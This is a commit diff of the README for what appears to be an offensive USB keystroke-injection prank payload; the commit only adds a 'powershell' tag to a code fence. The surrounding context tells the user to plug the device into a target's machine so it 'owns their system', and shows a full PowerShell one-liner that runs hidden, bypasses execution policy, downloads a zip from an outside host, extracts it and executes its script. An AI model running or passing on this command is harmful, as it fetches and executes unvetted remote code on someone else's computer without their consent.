Update ReadMe.md
This commit is contained in:
parent
d9a8f07de5
commit
aa37fe79d7
1 changed files with 1 additions and 1 deletions
|
@ -41,7 +41,7 @@ Afterwards it will walk around your targets screen pulling out personal informat
|
||||||
* Plug in your device
|
* Plug in your device
|
||||||
* 10 seconds later your goose is owning their system
|
* 10 seconds later your goose is owning their system
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
|
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
|
||||||
```
|
```
|
||||||
### Exiting the Payload
|
### Exiting the Payload
|
||||||
|
|
Loading…
Reference in a new issue